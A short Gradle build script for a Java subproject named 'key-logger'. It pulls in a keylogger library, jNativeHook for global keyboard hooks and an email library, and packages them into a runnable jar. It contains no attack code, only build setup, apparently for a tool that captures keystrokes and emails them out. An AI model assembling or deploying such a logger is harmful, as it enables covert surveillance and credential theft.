// TODO 8.1.1 when gradle to 8.x

plugins {
    id "com.github.johnrengelman.shadow" version "7.1.2"
}

dependencies {
    implementation project(':platform:base')
    implementation project(':tools:key-logger-library')
    implementation libraries.apacheCommonsEmail
    implementation libraries.jNativeHook
}

jar {
    manifest {
        attributes(
                'Built-By'       : System.properties['user.name'],
                'Build-Timestamp': new java.text.SimpleDateFormat("yyyy-MM-dd'T'HH:mm:ss.SSSZ").format(new Date()),
                'Created-By'     : "Gradle ${gradle.gradleVersion}",
                'Build-Jdk'      : "${System.properties['java.version']} (${System.properties['java.vendor']} ${System.properties['java.vm.version']})",
                'Build-OS'       : "${System.properties['os.name']} ${System.properties['os.arch']} ${System.properties['os.version']}",
                'Main-Class'     : "com.mossad.keylogger.Main"
        )
    }
}

description = 'key-logger'